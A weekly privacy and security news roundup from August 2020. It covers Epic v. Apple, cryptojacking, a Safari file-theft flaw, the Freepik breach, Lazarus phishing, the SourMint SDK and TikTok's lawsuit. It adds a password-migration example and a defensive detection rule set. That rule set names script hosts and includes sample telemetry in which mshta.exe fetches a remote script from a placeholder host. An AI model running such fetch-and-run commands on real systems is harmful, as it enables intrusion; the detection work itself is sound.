Privacy and Security related news for the week ending 2020 08 25

This week we start with a battle and end with an army, and both are cyber-related. We have an update on the uptick in browser-based cryptojacking, a couple of breaches that might affect you, and a new lawsuit that certainly will.

US: Microsoft backs Epic against Apple in legal fight over Unreal Engine on iOS

Kyle Orland for Ars Technica: In court documents that surfaced this weekend, Microsoft offered its support for Epic Games in the Unreal Engine-maker’s quickly unfolding legal battle with Apple over access to the iOS app marketplace.

The legal declaration from Microsoft Gaming Developer Experiences General Manager Kevin Gammill comes in response to Apple’s threat to halt Epic’s access to software development tools used to update its popular Unreal Engine for use on iOS. That threat itself came after Epic tried to use its own payment system in the iOS version of Fortnite to get around Apple’s 30-percent platform fee. That move quickly got the game pulled from the Apple App Store and led Epic to file a lawsuit in response.

Microsoft uses Unreal Engine for iOS games such as Forza Street, and Gammill says Epic’s software is “critical technology for numerous game creators, including Microsoft… if the Unreal Engine cannot support games for iOS or macOS, Microsoft would be required to choose between abandoning its customers and potential customers on the iOS and macOS platforms or choosing a different game engine when preparing to develop new games.”

Microsoft also exercises strict, iOS-style control over the software market on Xbox consoles and extracts a similar 30-percent fee for in-game items sold on the platform. But Sweeney has said these console markets are different from mobile platforms because of console-makers’ “enormous investment in hardware, often sold below cost, and marketing campaigns in broad partnership with publishers.”

Browser-based cryptojacking sees sudden spike in activity in Q2 2020

Browser-based cryptocurrency mining, also known as cryptojacking, made a surprising comeback earlier this year, in the month of June.

In its Threat Landscape Trends report for Q2 2020, US cyber-security vendor Symantec said cryptojacking saw a 163% increase in detections, compared to the previous quarters.

The spike in activity is extremely uncharacteristic for this particular threat, which security experts had considered long dead. Despite the sudden spike in browser-based cryptojacking detections in June, a full comeback is not expected. Most cybercrime groups that experimented with cryptojacking operations in the past dropped them within weeks, having discovered that browser-based cryptocurrency mining was both a waste of their time and too noisy, drawing more attention to their operations than it earned in profit.

Unpatched Safari Vulnerability Allows Local File Theft

The issue was discovered in April by Pawel Wylecial, a Poland-based security researcher and founder of cybersecurity services companies REDTEAM.PL and BlackOwlSec. Apple said at the time that it had started investigating the issue, but the tech giant told Wylecial in mid-August that it would only address it with a security update in the spring of 2021.

Apple asked the researcher to hold off disclosure until then, but Wylecial decided that it was too long and made his findings public this week.

The vulnerability is related to the Web Share API, which allows users to share links from Safari through third-party apps. Launching an attack requires convincing the targeted user to visit a malicious website and performing certain actions, but the researcher has described an attack scenario that could be successful.

He set up a website containing an image of a kitten and urging visitors to share it with their friends using a dedicated button on the page. When the user presses the button, they are asked to select the application they want to use to share a link to the image. If they send it via email, the attacker’s code, in addition to adding the image URL, attaches an arbitrary file from the victim’s system.

Wylecial says he has tested the attack on devices running iOS 13.4.1 and 13.6, macOS Mojave 10.14.16 with Safari 13.1, and on macOS Catalina 10.15.5 with Safari 13.1.1.

Eight Million Freepik Users Suffer Data Compromise

Freepik has disclosed a major data breach affecting over eight million customers.

Additionally, the incident affected users of the sister site Flaticon, which claims to run the world’s largest database of free icons.

In a breach notice over the weekend, the firm said an attacker had exploited an SQL injection vulnerability in the Flaticon site, which allowed them to access user information in a database.

Of the 8.3 million customers affected, all had their email address taken, and nearly 3.8 million had a hashed password for the site also stolen.

Most (3.6 million) were hashed with bcrypt, whilst 229,000 were protected with the less secure salted MD5. “Those who had a password hashed with salted MD5 got their password cancelled and have received an email to urge them to choose a new password and to change their password if it was shared with any other site.”
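The Freepik notice above describes the usual remediation for a legacy hash scheme: invalidate the weak hashes and force a reset. The following is an added example, not code from Freepik or from the original post, showing the complementary pattern a defender would want in place before a breach: verify logins against the legacy salted-MD5 record, and transparently re-hash the password with a slow, salted KDF on the next successful login. The record formats (`md5$…` and `pbkdf2_sha256$…`) are constructed for this example; the modern scheme uses the standard library’s PBKDF2 as a stand-in for bcrypt, which in Python needs the third-party `bcrypt` package.

```python
import hashlib
import hmac
import os
from typing import Dict, Optional

# Work factor for the stdlib stand-in (PBKDF2-HMAC-SHA256); bcrypt would use a cost parameter instead.
PBKDF2_ITERATIONS = 200_000


def legacy_md5_hash(password: str, salt: bytes) -> str:
    """Constructed legacy record: 'md5$<hex salt>$<hex md5(salt || password)>'.

    Kept only so that existing records can still be verified; never used for new records.
    """
    digest = hashlib.md5(salt + password.encode("utf-8")).hexdigest()
    return f"md5${salt.hex()}${digest}"


def modern_hash(password: str, salt: Optional[bytes] = None,
                iterations: int = PBKDF2_ITERATIONS) -> str:
    """Constructed modern record: 'pbkdf2_sha256$<iterations>$<hex salt>$<hex derived key>'."""
    salt = salt if salt is not None else os.urandom(16)
    dk = hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"), salt, iterations)
    return f"pbkdf2_sha256${iterations}${salt.hex()}${dk.hex()}"


def verify(password: str, stored: str) -> bool:
    """Recompute the stored record from the candidate password and compare in constant time."""
    parts = stored.split("$")
    if parts[0] == "md5" and len(parts) == 3:
        candidate = legacy_md5_hash(password, bytes.fromhex(parts[1]))
    elif parts[0] == "pbkdf2_sha256" and len(parts) == 4:
        candidate = modern_hash(password, bytes.fromhex(parts[2]), int(parts[1]))
    else:
        raise ValueError("unknown password hash scheme")
    return hmac.compare_digest(candidate, stored)


def needs_upgrade(stored: str) -> bool:
    """True for any record not yet using the slow KDF."""
    return not stored.startswith("pbkdf2_sha256$")


def login(user_db: Dict[str, str], username: str, password: str) -> bool:
    """Authenticate and, on success, silently migrate a legacy record to the modern scheme."""
    stored = user_db.get(username)
    if stored is None:
        # Burn the same cost as a real verification so unknown usernames are not
        # distinguishable from wrong passwords by response time.
        modern_hash(password)
        return False
    if not verify(password, stored):
        return False
    if needs_upgrade(stored):
        user_db[username] = modern_hash(password)   # new random salt, slow KDF
    return True


if __name__ == "__main__":
    # Constructed user table with one legacy salted-MD5 record.
    db = {"alice": legacy_md5_hash("correct horse battery", os.urandom(8))}
    print("before:", db["alice"][:20], "needs upgrade:", needs_upgrade(db["alice"]))
    print("login ok:", login(db, "alice", "correct horse battery"))
    print("after: ", db["alice"][:20], "needs upgrade:", needs_upgrade(db["alice"]))
```

Records that are never seen at login again (dormant accounts) are not migrated by this pattern, which is why a breach response still has to invalidate the remaining legacy hashes outright, as Freepik did.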

Lazarus group strikes cryptocurrency firm through LinkedIn job adverts

According to F-Secure, the latest Lazarus attack was tracked through a LinkedIn job advert. The human target, a system administrator, received a phishing document in their personal LinkedIn account that related to a blockchain technology company seeking a new sysadmin with the employee’s skill set.

The phishing email is similar to Lazarus samples already made available on VirusTotal, including the same names, authors, and word count elements.

As with many phishing documents, the attacker needs to entice the victim into enabling macros, which is where the malicious code hides, for the document to be effective. In this case, the Microsoft Word document claimed to be protected under the EU’s General Data Protection Regulation (GDPR), and so the document’s content could only be shown if macros were enabled.

Once macros are enabled, the document’s macro creates a .LNK file that launches mshta.exe and calls out to a link pointing at a VBScript (a concern on Windows machines).

A tailored version of Mimikatz is used to harvest credentials from an infected machine, especially those with financial value – such as cryptocurrency wallets or online bank accounts.

F-Secure says that Lazarus has attempted to avoid detection by wiping evidence, including deleting security events and logs.
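The chain described above (Word document, macro, .LNK shortcut, mshta.exe fetching a remote script) and the log-wiping noted by F-Secure each leave telemetry a SOC can key on. The following is an added example, not code from F-Secure or from the original post: a small rule set run over a handful of constructed, Sysmon-style process- and file-creation events plus a Security-channel log-cleared event. The event shape (`event_id`, `channel`, `image`, `parent_image`, `command_line`, `target_filename`), the sample paths and the URL are all constructed for this example and are not real indicators.

```python
import ntpath
from typing import Callable, Dict, List, Optional

# Process names involved in the chain above, lower-cased for matching.
OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe"}
SCRIPT_HOSTS = {"mshta.exe", "wscript.exe", "cscript.exe", "powershell.exe", "cmd.exe"}

# Constructed sample telemetry in a simplified Sysmon-like shape (not real logs).
# event_id "1" = process creation, "11" = file creation;
# channel "Security" with event_id "1102" = the audit log was cleared.
OFFICE = r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE"
SAMPLE_EVENTS: List[Dict[str, str]] = [
    {"event_id": "1", "channel": "Sysmon", "image": OFFICE, "parent_image": r"C:\Windows\explorer.exe",
     "command_line": r'"WINWORD.EXE" /n "C:\Users\sysadmin\Downloads\job_description.docx"'},
    {"event_id": "11", "channel": "Sysmon", "image": OFFICE,
     "target_filename": r"C:\Users\sysadmin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\update.lnk"},
    {"event_id": "1", "channel": "Sysmon", "image": r"C:\Windows\System32\mshta.exe", "parent_image": OFFICE,
     "command_line": "mshta.exe https://cdn.example.invalid/stage1.hta"},
    {"event_id": "1", "channel": "Sysmon", "image": r"C:\Windows\System32\notepad.exe",
     "parent_image": r"C:\Windows\explorer.exe", "command_line": "notepad.exe notes.txt"},
    {"event_id": "1102", "channel": "Security", "image": "", "command_line": ""},
]


def _base(path: Optional[str]) -> str:
    """Lower-cased file name of a Windows path; ntpath works on any host OS."""
    return ntpath.basename(path or "").lower()


def rule_office_spawns_script_host(ev: Dict[str, str]) -> Optional[str]:
    """An Office application directly launching a script host (mshta.exe etc.)."""
    if (ev.get("event_id") == "1" and _base(ev.get("parent_image")) in OFFICE_APPS
            and _base(ev.get("image")) in SCRIPT_HOSTS):
        return f"{_base(ev['parent_image'])} spawned {_base(ev['image'])}"
    return None


def rule_office_writes_lnk(ev: Dict[str, str]) -> Optional[str]:
    """An Office application writing a shortcut file, as the macro above does."""
    if (ev.get("event_id") == "11" and _base(ev.get("image")) in OFFICE_APPS
            and ev.get("target_filename", "").lower().endswith(".lnk")):
        return f"{_base(ev['image'])} wrote shortcut {ev['target_filename']}"
    return None


def rule_mshta_remote_url(ev: Dict[str, str]) -> Optional[str]:
    """mshta.exe pulling its script from a URL rather than a local file."""
    cmd = ev.get("command_line", "").lower()
    if (ev.get("event_id") == "1" and _base(ev.get("image")) == "mshta.exe"
            and ("http://" in cmd or "https://" in cmd)):
        return "mshta.exe invoked with a remote URL"
    return None


def rule_audit_log_cleared(ev: Dict[str, str]) -> Optional[str]:
    """The evidence-wiping step: Security log cleared (Windows Event ID 1102)."""
    if ev.get("channel") == "Security" and ev.get("event_id") == "1102":
        return "Security event log was cleared (Event ID 1102)"
    return None


RULES: List[Callable[[Dict[str, str]], Optional[str]]] = [
    rule_office_spawns_script_host,
    rule_office_writes_lnk,
    rule_mshta_remote_url,
    rule_audit_log_cleared,
]


def detect(events: List[Dict[str, str]]) -> List[Dict[str, object]]:
    """Run every rule over every event; one alert per (event, matching rule)."""
    alerts: List[Dict[str, object]] = []
    for idx, ev in enumerate(events):
        for rule in RULES:
            detail = rule(ev)
            if detail:
                alerts.append({"event_index": idx, "rule": rule.__name__, "detail": detail})
    return alerts


if __name__ == "__main__":
    for alert in detect(SAMPLE_EVENTS):
        print(f"[{alert['rule']}] event #{alert['event_index']}: {alert['detail']}")
```

The individual rules are noisy on their own (some line-of-business macros legitimately spawn cmd.exe), so in practice they are scored together per host and per short time window; the 1102 event is the one that should page someone regardless of what preceded it, since the whole point of clearing the log is to remove the other three signals.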

Google Project Zero expert found 3 flaws in Apache Web Server

Pierluigi Paganini: The Apache Foundation released version 2.4.46 to address three flaws affecting its web server software that could be potentially exploited by attackers, under specific conditions, to execute arbitrary code or to trigger a DoS condition by crashing the server.

DK: Viking Snowden: Denmark spy chief ‘relieved of duty’

Kieren McCarthy: Denmark’s top foreign intelligence chief has been suspended for spying on Danish citizens illegally for up to six years after a whistleblower released a trove of documents to government regulators.

In a press release [in Danish] yesterday, the independent regulator of the Danish security services (Tilsynet med Efterretningstjenesterne or TET) said it had received information from a whistleblower in November that revealed the country’s foreign intelligence service “had withheld key and crucial information,” and given “incorrect information on matters relating to the collection of the service and disclosure of information.”

The Danish government announced that the head of the Forsvarets Efterretningstjeneste (FE) service, Lars Findsen, as well as two senior officials who focused on military intelligence – and who were not named – had been “relieved of duty for the time being.”

Large Ad Network Collects Private Activity Data, Reroutes Clicks

An SDK dubbed SourMint has been used in more than 1,200 iOS apps currently available in the Apple App Store; these apps have a total of 300 million downloads per month.

Snyk researchers, who released the findings, did not observe the same malicious behavior in the Android versions of the SourMint SDK.

The experts analyzed the code obtained from Mintegral’s official GitHub account and found that the malicious behavior was present in versions of the iOS SDK going back to 5.5.1 (released in July 2019).

The behavior, according to Snyk, is as follows: the SourMint SDK can allow Mintegral to steal revenue from other ad networks used by applications integrating the SDK. It also allegedly harvests system and device information, along with URLs visited through applications that leverage the SDK.

“The Snyk research team has uncovered malicious behavior in a popular Advertising SDK used by over 1,200 apps in the AppStore which represent over 300 Million downloads per month, based on industry expert estimates.” reads a post published by the security firm.

“The malicious code was uncovered in the iOS versions of the SDK from the Chinese mobile ad platform provider, Mintegral dating back to July 2019.

The malicious code can spy on user activity by logging URL-based requests made through the app.

This activity is logged to a third-party server and could potentially include personally identifiable information (PII) and other sensitive information.”

US: TikTok Sues Over Ban Ordered by Trump

AFP: As tensions soared between the world’s two biggest economies, President Donald Trump signed an executive order on August 6 giving Americans 45 days to stop doing business with TikTok’s Chinese parent company ByteDance – effectively setting a deadline for a sale of the app to a US company.

“Today we are filing a complaint in federal court challenging the administration’s efforts to ban TikTok in the US,” the company said in a blog post.

TikTok argued in the lawsuit that Trump’s order was a misuse of the International Emergency Economic Powers Act because the platform – on which users share often playful short-form videos – is not “an unusual and extraordinary threat.”

The executive order “has the potential to strip the rights of that community without any evidence to justify such an extreme action,” the suit contended.

The app has been downloaded 175 million times in the US and more than a billion times around the world.

UK: British army considers trading tanks for keyboard troops

The Times reported today that “the changing character of warfare demands more investment in cyber-capabilities, space and other cutting-edge technologies.”

The Ministry of Defence (MoD) has been putting more time and effort into all things cyber, most recently raising a dedicated Security Operations Centre regiment after a previous Chief of the Defence Staff called for techies to join up as cyber-specialists.

Current Army thinking is that “digital”, “cyber” and “autonomous” capabilities will be more valuable in future wars than battalions of riflemen or regiments of heavy armored vehicles.

Britain is not alone in thinking cyber weaponry is becoming more important: last year French defense minister Florence Parly declared “cyber war has begun”, saying that the Fifth Republic would attack its foes using cyber techniques as well as traditional methods of warfare.

That’s it for this week DAMLers. Have fun, stay safe and stay secure!


Thanks for this update @rps!